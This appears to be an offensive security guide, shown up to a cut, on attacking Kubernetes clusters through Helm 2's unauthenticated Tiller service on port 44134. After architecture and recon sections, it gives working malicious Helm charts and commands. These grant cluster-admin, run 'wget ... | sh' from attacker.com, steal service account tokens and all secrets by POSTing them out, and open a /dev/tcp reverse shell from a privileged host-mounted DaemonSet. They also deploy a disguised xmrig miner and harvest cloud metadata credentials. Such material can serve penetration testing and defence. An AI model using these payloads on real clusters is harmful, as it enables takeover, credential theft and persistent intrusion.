# Tiller / Helm - Port 44134

{% tabs %}
{% tab title="Support VeryLazyTech 🎉" %}

* Become VeryLazyTech [**member**](https://shop.verylazytech.com/)**! 🎁**
* **Follow** us on:
  * **✖ Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.**
  * **👾 Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.**
  * **📜 Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.**
  * **📺 YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.**
  * **📩 Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.**
  * **🕵️‍♂️ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.**
* Visit our [**shop**](https://shop.verylazytech.com/) for e-books and courses. 📚
{% endtab %}
{% endtabs %}

## Basic info

Helm Tiller represents one of the most critical security vulnerabilities in Kubernetes environments. As the server-side component of Helm 2 (the Kubernetes package manager), Tiller's default configuration created a massive attack surface that allowed trivial privilege escalation from any compromised pod to full cluster admin access. While Helm 3 has eliminated Tiller entirely, countless production clusters still run Helm 2, making this a critical security assessment target.

#### The Tiller Problem

**What Makes Tiller So Dangerous?**

1. **No Authentication by Default**: Tiller's gRPC API (port 44134) accepts unauthenticated requests
2. **Cluster-Admin Privileges**: Default installations grant Tiller full cluster admin permissions
3. **Internal Network Exposure**: Any pod in the cluster can reach Tiller
4. **No Network Policies**: Default Kubernetes allows cross-namespace communication
5. **Legacy Deployments**: Many organizations still run Helm 2 in production

#### Impact Scenarios

When Tiller is compromised, attackers can:

* **Deploy malicious workloads** with cluster-admin privileges
* **Steal all Kubernetes secrets** including service account tokens
* **Pivot to cloud provider APIs** (AWS, GCP, Azure)
* **Establish persistent backdoors** in the cluster
* **Exfiltrate sensitive data** from all namespaces
* **Launch cryptominers** using cluster resources
* **Move laterally** to other connected systems

#### Historical Context

* **2018**: Security researchers publicly demonstrate Tiller exploitation
* **2019**: Multiple tools and exploits released (ropnop's pentest\_charts, munnerz/helmsploit)
* **2019**: Helm 3 announced with Tiller removal
* **2020**: CVE-2019-4185 published affecting IBM InfoSphere
* **2020**: Helm 2 reaches end of support (November 2020), yet remains widely deployed

***

### Understanding Helm and Tiller Architecture

#### What is Helm?

Helm is the **package manager for Kubernetes**, analogous to:

* `apt`/`yum` for Linux
* `homebrew` for macOS
* `npm` for Node.js

**Helm Charts** package Kubernetes YAML manifests into reusable, configurable deployments.

#### Helm 2 vs Helm 3

**Helm 2 Architecture (with Tiller)**

```
┌─────────────────┐
│  Helm Client    │
│  (Local CLI)    │
└────────┬────────┘
         │
         │ gRPC (port-forward)
         │
         ▼
┌─────────────────────────────────────┐
│   Kubernetes Cluster                │
│                                     │
│  ┌──────────────────┐              │
│  │  Tiller Pod      │              │
│  │  Port: 44134     │              │
│  │  Service Account:│──────┐       │
│  │  cluster-admin   │      │       │
│  └──────────────────┘      │       │
│         │                  │       │
│         │ Kubernetes API   │       │
│         ▼                  ▼       │
│  ┌──────────────────────────────┐ │
│  │   Kubernetes API Server      │ │
│  └──────────────────────────────┘ │
└─────────────────────────────────────┘
```

**Helm 3 Architecture (no Tiller)**

```
┌─────────────────┐
│  Helm Client    │
│  (Local CLI)    │
└────────┬────────┘
         │
         │ Direct API calls
         │
         ▼
┌─────────────────────────────────────┐
│   Kubernetes Cluster                │
│                                     │
│  ┌──────────────────────────────┐  │
│  │   Kubernetes API Server      │  │
│  │   (User RBAC applied)        │  │
│  └──────────────────────────────┘  │
└─────────────────────────────────────┘
```

**Key Difference**: Helm 3 eliminates the server-side component (Tiller), communicating directly with the Kubernetes API using the user's own credentials and RBAC permissions.

#### Tiller Service Account & RBAC

In typical default installations, Tiller is configured with:

```yaml
apiVersion: v1
kind: ServiceAccount
metadata:
  name: tiller
  namespace: kube-system
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: tiller
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: cluster-admin  # FULL ADMIN PRIVILEGES
subjects:
  - kind: ServiceAccount
    name: tiller
    namespace: kube-system
```

This grants Tiller:

* Full read/write access to all namespaces
* Ability to create/delete any resource
* Access to all secrets
* Cluster-level administrative functions

#### Tiller Communication Protocol

**Port**: 44134/TCP\
**Protocol**: gRPC (HTTP/2)\
**Authentication**: None by default\
**Encryption**: None by default (can be configured with TLS)

**gRPC API Endpoints** (from Protobuf definitions):

```protobuf
service ReleaseService {
    rpc ListReleases(ListReleasesRequest) returns (stream ListReleasesResponse) {}
    rpc GetReleaseStatus(GetReleaseStatusRequest) returns (GetReleaseStatusResponse) {}
    rpc GetReleaseContent(GetReleaseContentRequest) returns (GetReleaseContentResponse) {}
    rpc UpdateRelease(UpdateReleaseRequest) returns (UpdateReleaseResponse) {}
    rpc InstallRelease(InstallReleaseRequest) returns (InstallReleaseResponse) {}
    rpc UninstallRelease(UninstallReleaseRequest) returns (UninstallReleaseResponse) {}
    rpc GetVersion(GetVersionRequest) returns (GetVersionResponse) {}
    rpc RollbackRelease(RollbackReleaseRequest) returns (RollbackReleaseResponse) {}
    rpc GetHistory(GetHistoryRequest) returns (GetHistoryResponse) {}
}
```
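
On the wire, each of these RPCs is a standard gRPC call: a serialized protobuf message wrapped in a 5-byte length-prefixed frame (1-byte compression flag + 4-byte big-endian length) carried over HTTP/2. A minimal sketch of that framing — the `GET_VERSION` method path follows Tiller's `hapi.services.tiller` protobuf package naming, and is shown for illustration:

```python
import struct

def grpc_frame(message: bytes, compressed: bool = False) -> bytes:
    """Wrap a serialized protobuf message in the standard gRPC
    length-prefixed frame: 1-byte compressed flag + 4-byte big-endian length."""
    return struct.pack(">BI", 1 if compressed else 0, len(message)) + message

# Fully-qualified method path for the version probe, per Tiller's protobufs:
GET_VERSION = "/hapi.services.tiller.ReleaseService/GetVersion"

# GetVersionRequest has no fields, so its serialized form is empty:
print(grpc_frame(b"").hex())  # 0000000000
```

A real client (like the Helm 2 CLI) sends this frame in an HTTP/2 DATA frame to that path, which is why plain HTTP/1.1 probes against port 44134 get rejected.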

***

## Why Tiller is a Security Risk

#### 1. No Authentication Required

By default, Tiller accepts **any** gRPC request without authentication:

```bash
# Any pod can do this:
helm --host tiller-deploy.kube-system:44134 list
```

**No credentials needed. No API tokens. Nothing.**

#### 2. Cluster-Admin Privileges

Tiller's service account has `cluster-admin` role, meaning it can:

```bash
# Create any resource in any namespace
kubectl create deployment malicious -n kube-system

# Read all secrets
kubectl get secrets --all-namespaces

# Create cluster-level resources
kubectl create clusterrolebinding backdoor --clusterrole=cluster-admin --user=attacker

# Delete critical resources
kubectl delete deployment kube-dns -n kube-system
```

#### 3. Network Accessibility

**Kubernetes DNS** makes Tiller discoverable from any pod:

```bash
# From any pod in any namespace:
nslookup tiller-deploy.kube-system.svc.cluster.local
# Returns: 10.96.0.5

telnet tiller-deploy.kube-system.svc.cluster.local 44134
# Connection successful!
```

**No network policies** by default = any pod can reach Tiller.

#### 4. Attack Chain

```
Compromised Pod → Discover Tiller → Talk to Tiller → 
Deploy Privileged Pod → Steal Service Account Token → 
Full Cluster Admin Access → Persistent Backdoor
```

**Time to full compromise**: Minutes

#### 5. Real-World Impact

Organizations affected by Tiller vulnerabilities:

* **Tesla** (2018): Cryptojacking via exposed Kubernetes
* **IBM InfoSphere** (CVE-2019-4185): Privilege escalation
* **Numerous enterprises**: Unreported incidents

***

## Reconnaissance & Discovery

#### 1. Internal Discovery (From Compromised Pod)

**Check for Kubernetes Indicators**

```bash
# Are we in a container?
ls -la /.dockerenv

# Kubernetes environment variables
env | grep KUBERNETES

# Check service account
ls -la /var/run/secrets/kubernetes.io/serviceaccount/

# Read namespace
cat /var/run/secrets/kubernetes.io/serviceaccount/namespace
```

**Expected Output:**

```
KUBERNETES_SERVICE_HOST=10.96.0.1
KUBERNETES_SERVICE_PORT=443
```

**DNS-Based Service Discovery**

```bash
# Check DNS configuration
cat /etc/resolv.conf

# Example output:
# nameserver 10.96.0.10
# search default.svc.cluster.local svc.cluster.local cluster.local
# options ndots:5
```

The `search` domains tell us:

* Current namespace: `default`
* Cluster domain: `cluster.local`
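
This inference is easy to script; a small sketch (pure string parsing, no cluster required) that derives both values from a resolv.conf string, using the example contents shown above:

```python
def parse_search_line(resolv_conf: str):
    """Derive the current namespace and cluster domain from the Kubernetes
    'search' directive (<namespace>.svc.<domain> is always the first entry)."""
    for line in resolv_conf.splitlines():
        if line.startswith("search"):
            first = line.split()[1]          # e.g. default.svc.cluster.local
            ns, _svc, *domain = first.split(".")
            return ns, ".".join(domain)
    return None, None

conf = (
    "nameserver 10.96.0.10\n"
    "search default.svc.cluster.local svc.cluster.local cluster.local\n"
    "options ndots:5\n"
)
print(parse_search_line(conf))  # ('default', 'cluster.local')
```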

**Enumerate Services via DNS**

```bash
# Test for Tiller in kube-system
nslookup tiller-deploy.kube-system.svc.cluster.local

# Alternative DNS tools
getent hosts tiller-deploy.kube-system.svc.cluster.local
host tiller-deploy.kube-system.svc.cluster.local

# Ping resolves the name (ClusterIPs are virtual and usually won't answer ICMP)
ping -c 1 tiller-deploy.kube-system.svc.cluster.local
```

**Successful Response:**

```
Server:		10.96.0.10
Address:	10.96.0.10#53

Name:	tiller-deploy.kube-system.svc.cluster.local
Address: 10.98.57.159
```

**Port Scanning from Inside Cluster**

```bash
# Test if port 44134 is open
timeout 1 bash -c 'cat < /dev/null > /dev/tcp/tiller-deploy.kube-system/44134'
echo $?
# 0 = success, port open

# Using netcat (if available)
nc -zv tiller-deploy.kube-system.svc.cluster.local 44134

# Using curl
curl -v tiller-deploy.kube-system.svc.cluster.local:44134
# gRPC will reject HTTP, but confirms port is listening
```
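
If none of those tools are present but Python is, the same TCP check takes a few lines with sockets. A sketch — the ClusterIP in the demo is the example value from this page, so substitute your actual target:

```python
import socket

def is_port_open(host: str, port: int, timeout: float = 2.0) -> bool:
    """Return True if a TCP connection to host:port succeeds within timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

if __name__ == "__main__":
    # Example ClusterIP from the DNS discovery output above; replace as needed
    print("44134 open:", is_port_open("10.98.57.159", 44134))
```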

#### 2. External Discovery (Network Perspective)

**Nmap Scanning**

```bash
# Basic port scan
nmap -p 44134 <cluster-node-ip>

# Service version detection
nmap -sV -p 44134 <cluster-node-ip>

# Comprehensive scan
sudo nmap -sS -sV -A -p 44134 <cluster-node-ip>
```

**Expected Output (if exposed):**

```
PORT      STATE SERVICE VERSION
44134/tcp open  unknown
| fingerprint-strings:
|   NULL:
|     HTTP/1.1 400 Bad Request
```

**Shodan Queries**

```
# Search for exposed Tiller instances
port:44134

# Combined with Kubernetes indicators
port:44134 "kubernetes"

# GKE-specific
port:44134 "gke"
```

#### 3. Kubernetes API Discovery (if accessible)

```bash
# List pods in kube-system
kubectl get pods -n kube-system | grep tiller

# List services
kubectl get services -n kube-system | grep tiller

# Describe Tiller deployment
kubectl describe deployment tiller-deploy -n kube-system

# Check service account
kubectl get serviceaccount tiller -n kube-system -o yaml
```

**Example Output:**

```bash
$ kubectl get pods -n kube-system
NAME                                       READY   STATUS    RESTARTS   AGE
tiller-deploy-56b574c76d-l265z             1/1     Running   0          35m

$ kubectl get services -n kube-system
NAME            TYPE        CLUSTER-IP     EXTERNAL-IP   PORT(S)       AGE
tiller-deploy   ClusterIP   10.98.57.159   <none>        44134/TCP     35m
```

#### 4. Cloud Provider Metadata (GKE/EKS/AKS)

**Google Cloud (GKE)**

```bash
# From compromised pod
curl -s -H "Metadata-Flavor: Google" \
  http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env

# Extract master endpoint
curl -s -H "Metadata-Flavor: Google" \
  http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env | \
  grep KUBERNETES_MASTER_NAME
```

**Amazon Web Services (EKS)**

```bash
# Get instance metadata
curl http://169.254.169.254/latest/meta-data/

# Get IAM role
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/

# Get instance identity
curl http://169.254.169.254/latest/dynamic/instance-identity/document
```

**Microsoft Azure (AKS)**

```bash
# Instance metadata
curl -H "Metadata: true" \
  http://169.254.169.254/metadata/instance?api-version=2021-02-01

# MSI token
curl -H "Metadata: true" \
  "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"
```

***

## Enumeration Techniques

#### 1. Installing Helm Client in Compromised Pod

```bash
# Set Helm version (match server version)
export HELM_VERSION=v2.17.0

# Download Helm binary
curl -L "https://get.helm.sh/helm-${HELM_VERSION}-linux-amd64.tar.gz" | \
  tar xz --strip-components=1 -C /tmp linux-amd64/helm

# Make executable
chmod +x /tmp/helm

# Initialize client-only (no Tiller installation)
export HELM_HOME=/tmp/helmhome
/tmp/helm init --client-only
```

**Alternative**: Use pre-compiled static binary from GitHub releases

#### 2. Testing Connectivity

```bash
# Set Tiller host
export HELM_HOST=tiller-deploy.kube-system:44134

# Get Helm/Tiller version
/tmp/helm version

# Expected output:
# Client: &version.Version{SemVer:"v2.17.0", ...}
# Server: &version.Version{SemVer:"v2.17.0", ...}
```

**If you see both client and server versions, you have successful communication!**
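
That `Server:` line is the success signal, so fingerprinting can be scripted; a sketch that pulls the Tiller SemVer out of `helm version` output (the sample string mirrors the expected output above):

```python
import re

def tiller_server_version(helm_output: str):
    """Extract the Tiller (server) SemVer from `helm version` output,
    or None if no server responded."""
    m = re.search(r'Server: &version\.Version\{SemVer:"([^"]+)"', helm_output)
    return m.group(1) if m else None

sample = (
    'Client: &version.Version{SemVer:"v2.17.0", GitTreeState:"clean"}\n'
    'Server: &version.Version{SemVer:"v2.17.0", GitTreeState:"clean"}\n'
)
print(tiller_server_version(sample))  # v2.17.0
```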

#### 3. Listing Helm Releases

```bash
# List all releases
/tmp/helm list

# List releases in all namespaces
/tmp/helm list --all

# Get detailed release information
/tmp/helm status <release-name>

# Get release history
/tmp/helm history <release-name>
```

**Example Output:**

```
NAME         REVISION  UPDATED                   STATUS    CHART              NAMESPACE
mycoolblog   1         Mon Jan 28 10:30:00 2019  DEPLOYED  wordpress-5.0.2    default
prometheus   3         Thu Jan 24 15:20:00 2019  DEPLOYED  prometheus-8.9.1   monitoring
```

#### 4. Inspecting Release Content

```bash
# Get release manifest
/tmp/helm get manifest <release-name>

# Get release values
/tmp/helm get values <release-name>

# Get all release information
/tmp/helm get <release-name>
```

This reveals:

* All Kubernetes resources deployed
* Configuration values used
* **Potentially sensitive data** (passwords, API keys, etc.)
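
Grepping dumped values for credentials by hand doesn't scale across many releases; a sketch that walks decoded release values and flags credential-looking keys (the regex patterns and the sample values dict are illustrative heuristics, not from a real chart):

```python
import re

# Heuristic patterns for credential-like key names (case-insensitive)
SENSITIVE = re.compile(r"pass(word)?|token|secret|api[_-]?key|credential", re.I)

def find_sensitive(values: dict, path: str = "") -> list:
    """Walk a nested values dict and return dotted paths whose key
    name looks credential-like."""
    hits = []
    for key, val in values.items():
        here = f"{path}.{key}" if path else key
        if isinstance(val, dict):
            hits.extend(find_sensitive(val, here))
        elif SENSITIVE.search(key):
            hits.append(here)
    return hits

release_values = {  # shape loosely mimics a wordpress chart's values
    "wordpressPassword": "s3cret",
    "mariadb": {"rootUser": {"password": "also-s3cret"}, "replicas": 1},
}
print(find_sensitive(release_values))
# ['wordpressPassword', 'mariadb.rootUser.password']
```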

#### 5. Discovering Helm Repositories

```bash
# List configured repositories
/tmp/helm repo list

# Search for charts
/tmp/helm search

# Add new repository
/tmp/helm repo add myrepo https://charts.example.com
```

#### 6. Checking Tiller Configuration

```bash
# Get Tiller pod name
kubectl get pods -n kube-system -l app=helm,name=tiller

# Describe Tiller pod
kubectl describe pod <tiller-pod-name> -n kube-system

# Check service account
kubectl get pod <tiller-pod-name> -n kube-system -o jsonpath='{.spec.serviceAccountName}'
```

**Look for:**

* Service account name (usually `tiller`)
* RBAC permissions
* Network policies (or lack thereof)
* TLS configuration

***

## Authentication & Access Analysis

#### 1. Understanding Tiller's Default Security Posture

**Default Configuration Issues:**

| Security Control | Default State     | Risk                     |
| ---------------- | ----------------- | ------------------------ |
| Authentication   | **DISABLED**      | Anyone can connect       |
| Authorization    | **DISABLED**      | No access control        |
| TLS/Encryption   | **DISABLED**      | Plaintext communication  |
| Network Policy   | **NONE**          | Accessible from all pods |
| RBAC             | **cluster-admin** | Full cluster privileges  |

#### 2. Testing Authentication

```bash
# Test 1: No authentication required
export HELM_HOST=tiller-deploy.kube-system:44134
/tmp/helm list
# If this works, NO AUTHENTICATION IS REQUIRED

# Test 2: Check if TLS is enforced
/tmp/helm version
# If successful without --tls flag, TLS is NOT enforced

# Test 3: Try with TLS (will fail if not configured)
/tmp/helm version --tls
# Error: transport is closing - TLS not configured
```

#### 3. Analyzing Tiller's Service Account Permissions

From a position with `kubectl` access:

```bash
# Get Tiller's service account
SA=$(kubectl get deploy tiller-deploy -n kube-system \
  -o jsonpath='{.spec.template.spec.serviceAccountName}')

echo "Tiller Service Account: $SA"

# Get ClusterRoleBindings for this SA
kubectl get clusterrolebindings -o json | \
  jq -r '.items[] | select(.subjects[]? | 
    select(.kind=="ServiceAccount" and .name=="'$SA'")) | 
    .metadata.name + " -> " + .roleRef.name'

# Check what Tiller can do
kubectl auth can-i --list --as=system:serviceaccount:kube-system:tiller
```

**Typical Output (vulnerable configuration):**

```
tiller -> cluster-admin

Resources                                       Non-Resource URLs   Resource Names   Verbs
*.*                                            []                  []               [*]
                                               [*]                 []               [*]
```

**This means Tiller can do ANYTHING in the cluster.**

#### 4. Network Policy Analysis

```bash
# Check if network policies exist
kubectl get networkpolicies --all-namespaces

# Check policies affecting kube-system
kubectl get networkpolicies -n kube-system

# Describe network policy
kubectl describe networkpolicy <policy-name> -n kube-system
```

**If output is empty or no policies restrict Tiller, it's accessible from anywhere.**
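
Deciding whether an existing policy actually covers Tiller means matching each policy's `podSelector` against the pod's labels (`app=helm,name=tiller` for a default Tiller deploy). A simplified sketch that handles only `matchLabels` (real policies may also use `matchExpressions`, which this ignores):

```python
def selects_pod(policy: dict, pod_labels: dict) -> bool:
    """True if a NetworkPolicy's spec.podSelector matchLabels all match the
    pod's labels. An empty selector selects every pod in its namespace."""
    match = policy.get("spec", {}).get("podSelector", {}).get("matchLabels", {})
    return all(pod_labels.get(k) == v for k, v in match.items())

tiller_labels = {"app": "helm", "name": "tiller"}   # default Tiller labels
policies = [
    {"metadata": {"name": "deny-all"}, "spec": {"podSelector": {}}},
    {"metadata": {"name": "db-only"},
     "spec": {"podSelector": {"matchLabels": {"app": "db"}}}},
]
covering = [p["metadata"]["name"] for p in policies if selects_pod(p, tiller_labels)]
print(covering)  # ['deny-all']
```

If `covering` comes back empty for every policy in `kube-system`, nothing restricts traffic to Tiller.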

#### 5. Attempting Unauthorized Access

```python
#!/usr/bin/env python3
"""
Test Tiller gRPC access without Helm client
"""
import grpc
import sys

def test_tiller_access(host='tiller-deploy.kube-system', port=44134):
    """
    Attempt to connect to Tiller gRPC endpoint
    """
    try:
        # Create insecure channel (no TLS)
        channel = grpc.insecure_channel(f'{host}:{port}')
        
        # Try to connect (with timeout)
        grpc.channel_ready_future(channel).result(timeout=5)
        
        print(f"[+] Successfully connected to {host}:{port}")
        print(f"[+] Tiller is accessible without authentication!")
        return True
        
    except grpc.FutureTimeoutError:
        print(f"[-] Connection timeout to {host}:{port}")
        return False
    except Exception as e:
        print(f"[-] Connection failed: {e}")
        return False

if __name__ == "__main__":
    host = sys.argv[1] if len(sys.argv) > 1 else 'tiller-deploy.kube-system'
    test_tiller_access(host)
```

***

## Exploitation Techniques

#### 1. Basic Privilege Escalation via Helm Chart Deployment

The core exploitation technique is simple:

1. Deploy a malicious Helm chart
2. Chart creates privileged resources
3. Gain elevated access

**Simple Privilege Escalation Chart:**

```yaml
# Chart structure
exploit-chart/
├── Chart.yaml
└── templates/
    ├── serviceaccount.yaml
    ├── clusterrolebinding.yaml
    └── job.yaml
```

**Chart.yaml:**

```yaml
apiVersion: v1
appVersion: "1.0"
description: Privilege Escalation PoC
name: exploit-chart
version: 0.1.0
```

**templates/serviceaccount.yaml:**

```yaml
apiVersion: v1
kind: ServiceAccount
metadata:
  name: {{ .Values.serviceAccountName }}
  namespace: {{ .Values.namespace }}
```

**templates/clusterrolebinding.yaml:**

```yaml
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: {{ .Values.serviceAccountName }}-binding
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: cluster-admin
subjects:
  - kind: ServiceAccount
    name: {{ .Values.serviceAccountName }}
    namespace: {{ .Values.namespace }}
```

**templates/job.yaml:**

```yaml
apiVersion: batch/v1
kind: Job
metadata:
  name: {{ .Values.jobName }}
  namespace: {{ .Values.namespace }}
spec:
  template:
    spec:
      serviceAccountName: {{ .Values.serviceAccountName }}
      containers:
        - name: privesc
          image: alpine:latest
          command: ["sh", "-c", "echo 'Privileged access gained'; sleep 3600"]
      restartPolicy: Never
```

**Deployment:**

```bash
# Create chart directory
mkdir -p exploit-chart/templates

# Create files (as shown above)

# Deploy chart via Tiller
export HELM_HOST=tiller-deploy.kube-system:44134
/tmp/helm install ./exploit-chart \
  --name pwned \
  --set serviceAccountName=hacker \
  --set namespace=kube-system \
  --set jobName=backdoor
```

Now you have a service account with cluster-admin privileges!

#### 2. Remote Code Execution via Malicious Chart

**Chart that executes arbitrary commands:**

```yaml
# templates/rce-job.yaml
apiVersion: batch/v1
kind: Job
metadata:
  name: {{ .Values.name }}
  namespace: kube-system
spec:
  template:
    spec:
      containers:
        - name: rce
          image: alpine:latest
          command:
            - "/bin/sh"
            - "-c"
            - |
              {{ .Values.command }}
      restartPolicy: Never
```

**Deploy with custom command:**

```bash
/tmp/helm install ./rce-chart \
  --name rce-job \
  --set name=innocent-job \
  --set command="wget http://attacker.com/backdoor.sh -O- | sh"
```

#### 3. Credential Harvesting

**Chart to steal service account tokens:**

```yaml
# templates/token-stealer.yaml
apiVersion: batch/v1
kind: Job
metadata:
  name: token-harvester
  namespace: kube-system
spec:
  template:
    spec:
      serviceAccountName: {{ .Values.targetServiceAccount }}
      containers:
        - name: stealer
          image: curlimages/curl:latest
          command:
            - "sh"
            - "-c"
            - |
              TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
              curl -X POST -d "token=$TOKEN" {{ .Values.exfilURL }}
      restartPolicy: Never
```

**Deploy:**

```bash
/tmp/helm install ./token-stealer \
  --name harvest \
  --set targetServiceAccount=tiller \
  --set exfilURL=https://attacker.com/collect
```

#### 4. Persistent Backdoor Deployment

```yaml
# templates/backdoor-daemonset.yaml
apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: system-monitor  # Innocuous name
  namespace: kube-system
  labels:
    k8s-app: system-monitor
spec:
  selector:
    matchLabels:
      name: system-monitor
  template:
    metadata:
      labels:
        name: system-monitor
    spec:
      hostNetwork: true
      hostPID: true
      containers:
        - name: monitor
          image: alpine:latest
          command:
            - "sh"
            - "-c"
            - |
              # Reverse shell
              while true; do
                sh -i >& /dev/tcp/attacker.com/4444 0>&1 || sleep 60
              done
          securityContext:
            privileged: true
          volumeMounts:
            - name: host-root
              mountPath: /host
      volumes:
        - name: host-root
          hostPath:
            path: /
```

This creates a **DaemonSet** that:

* Runs on every node
* Has privileged access
* Maintains reverse shell connection
* Survives pod restarts

#### 5. Cryptomining Deployment

```yaml
# templates/miner.yaml
apiVersion: apps/v1
kind: Deployment
metadata:
  name: analytics-worker  # Disguised name
  namespace: default
spec:
  replicas: {{ .Values.replicas }}
  selector:
    matchLabels:
      app: analytics
  template:
    metadata:
      labels:
        app: analytics
    spec:
      containers:
        - name: worker
          image: xmrig/xmrig:latest
          args:
            - "-o"
            - "pool.minexmr.com:4444"
            - "-u"
            - "{{ .Values.walletAddress }}"
            - "-k"
          resources:
            requests:
              cpu: "100m"
            limits:
              cpu: "4000m"
```

***

## Post-Exploitation & Privilege Escalation

#### 1. Stealing Tiller's Service Account Token

This is the **primary privilege escalation path**. Tiller's service account token provides cluster-admin access to the Kubernetes API.

**Method 1: Via Malicious Job**

```yaml
apiVersion: batch/v1
kind: Job
metadata:
  name: token-exfil
  namespace: kube-system
spec:
  template:
    spec:
      serviceAccountName: tiller  # Use Tiller's SA
      containers:
        - name: exfil
          image: curlimages/curl:latest
          command:
            - "sh"
            - "-c"
            - |
              TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
              curl -X POST \
                -H "Content-Type: application/json" \
                -d "{\"token\":\"$TOKEN\"}" \
                https://attacker.com/collect
      restartPolicy: Never
```

**Deploy:**

```bash
/tmp/helm install ./token-exfil \
  --name exfil \
  --namespace kube-system
```

**Method 2: Extract from All Secrets**

```yaml
apiVersion: batch/v1
kind: Job
metadata:
  name: secret-dump
  namespace: kube-system
spec:
  template:
    spec:
      serviceAccountName: cluster-admin-sa
      containers:
        - name: dumper
          image: bitnami/kubectl:latest
          command:
            - "sh"
            - "-c"
            - |
              kubectl get secrets --all-namespaces -o json | \
                curl -X POST \
                -H "Content-Type: application/json" \
                --data-binary @- \
                https://attacker.com/secrets
      restartPolicy: Never
```

First, deploy a chart that creates cluster-admin SA, then use it to dump secrets.

#### 2. Using ropnop's Pentest Charts

**Installation:**

```bash
# Add pentest charts repository
/tmp/helm repo add pentest https://ropnop.github.io/pentest_charts

# Update repositories
/tmp/helm repo update
```

**Available Charts:**

**exfil\_sa\_token**

Steals a specific service account token:

```bash
/tmp/helm install pentest/exfil_sa_token \
  --name steal-tiller \
  --set serviceAccountName=tiller \
  --set exfilURL=https://attacker.com/collect \
  --set name=tiller-deploy
```

**exfil\_secrets**

Creates new cluster-admin SA and extracts ALL secrets:

```bash
/tmp/helm install pentest/exfil_secrets \
  --name dump-all \
  --set serviceAccountName=pwn-sa \
  --set exfilURL=https://attacker.com/dump
```

**Cleanup:**

```bash
/tmp/helm delete --purge steal-tiller
/tmp/helm delete --purge dump-all
```

#### 3. Direct Kubernetes API Access

Once you have Tiller's token:

```bash
# Extract token from captured data
export TOKEN="eyJhbGciOiJSUzI1NiIsImtpZCI6Ik..."

# Get cluster endpoint (from metadata or known)
export K8S_API="https://10.96.0.1:443"

# Test access
curl -k -H "Authorization: Bearer $TOKEN" $K8S_API/api/v1/namespaces

# List all pods
curl -k -H "Authorization: Bearer $TOKEN" \
  $K8S_API/api/v1/pods?limit=500

# Create privileged pod
cat <<EOF | curl -k -H "Authorization: Bearer $TOKEN" \
  -X POST -H "Content-Type: application/json" \
  -d @- $K8S_API/api/v1/namespaces/default/pods
{
  "apiVersion": "v1",
  "kind": "Pod",
  "metadata": {"name": "shell"},
  "spec": {
    "containers": [{
      "name": "shell",
      "image": "alpine",
      "command": ["/bin/sh", "-c", "sleep 3600"]
    }]
  }
}
EOF
```

#### 4. Configuring kubectl with Stolen Token

```bash
# Set cluster configuration
kubectl config set-cluster pwned-cluster \
  --server=https://10.96.0.1:443 \
  --insecure-skip-tls-verify=true

# Set credentials
kubectl config set-credentials tiller-token \
  --token=$TOKEN

# Set context
kubectl config set-context pwned \
  --cluster=pwned-cluster \
  --user=tiller-token

# Use context
kubectl config use-context pwned

# Verify access
kubectl cluster-info
kubectl get nodes
kubectl get pods --all-namespaces
```

**You now have full cluster-admin access!**

#### 5. Establishing Persistent Access

**Create Permanent Backdoor Service Account:**

```yaml
apiVersion: v1
kind: ServiceAccount
metadata:
  name: backdoor-admin
  namespace: kube-system
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: backdoor-admin
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: cluster-admin
subjects:
  - kind: ServiceAccount
    name: backdoor-admin
    namespace: kube-system
```

```bash
# Apply via kubectl or Helm
kubectl apply -f backdoor-sa.yaml

# Extract token
kubectl get secret -n kube-system \
  $(kubectl get sa backdoor-admin -n kube-system \
    -o jsonpath='{.secrets[0].name}') \
  -o jsonpath='{.data.token}' | base64 -d

# Save token for future access
```
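
Before stashing a token, it's worth confirming which service account it actually belongs to. Legacy service account tokens are JWTs whose payload carries `kubernetes.io/serviceaccount/*` claims; a sketch that decodes that payload without signature verification (the demo token below is locally crafted for illustration, not a real one):

```python
import base64
import json

def jwt_payload(token: str) -> dict:
    """Decode a JWT's payload segment without verifying the signature
    (enough to inspect the service account claims)."""
    payload = token.split(".")[1]
    payload += "=" * (-len(payload) % 4)        # restore base64url padding
    return json.loads(base64.urlsafe_b64decode(payload))

# Demo with a crafted, unsigned token of the same shape:
claims = {"kubernetes.io/serviceaccount/namespace": "kube-system",
          "kubernetes.io/serviceaccount/service-account.name": "backdoor-admin"}
seg = base64.urlsafe_b64encode(json.dumps(claims).encode()).rstrip(b"=").decode()
fake = f"eyJhbGciOiJSUzI1NiJ9.{seg}.sig"
print(jwt_payload(fake)["kubernetes.io/serviceaccount/service-account.name"])
# backdoor-admin
```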

***

## Advanced Attack Scenarios

#### 1. Lateral Movement to Cloud Provider

**GKE (Google Kubernetes Engine):**

```bash
# From compromised pod with access to node
curl -H "Metadata-Flavor: Google" \
  http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token

# Get GCP project ID
curl -H "Metadata-Flavor: Google" \
  http://metadata.google.internal/computeMetadata/v1/project/project-id

# List GCS buckets using stolen token
curl -H "Authorization: Bearer $GCP_TOKEN" \
  https://www.googleapis.com/storage/v1/b?project=$PROJECT_ID
```

**EKS (AWS Elastic Kubernetes Service):**

```bash
# Get IAM role credentials
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/<role-name>

# Use credentials with AWS CLI
export AWS_ACCESS_KEY_ID=...
export AWS_SECRET_ACCESS_KEY=...
export AWS_SESSION_TOKEN=...

aws s3 ls
